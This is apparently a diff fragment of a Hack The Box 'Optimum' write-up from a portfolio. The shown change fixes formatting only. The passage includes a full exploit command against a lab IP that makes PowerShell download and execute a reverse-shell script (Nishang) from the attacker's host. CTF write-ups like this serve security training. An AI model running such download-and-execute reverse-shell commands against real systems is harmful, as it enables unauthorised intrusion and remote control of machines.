Hackopotamus/portfolio/_writeups/2026-08-29-htb-optimum.md

 Everything is now ready and we can send the payload.
 We'll use `exploit.py` to achieve RCE, then use PowerShell with an `IEX` expression to create a WebClient instance that downloads and executes `rev.ps1`.
 This is our Nishang `Invoke-PowerShellTcpOneLine` reverse shell script.

-Once the process completes, we land a session on the machine as the 'kostas' user.
+Once the process completes, we land a session on the machine as the `kostas` user.
 We now have an actual foothold on the system, and this also gives us the answer to 'Guided Mode' task three's question.
 ``` Shell
 ┌──(kali㉿kali)-[~/…/Hack The Box/Machines/Optimum/Exploit]
 └─$ python3 exploit.py 10.129.54.27 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.62/rev.ps1')"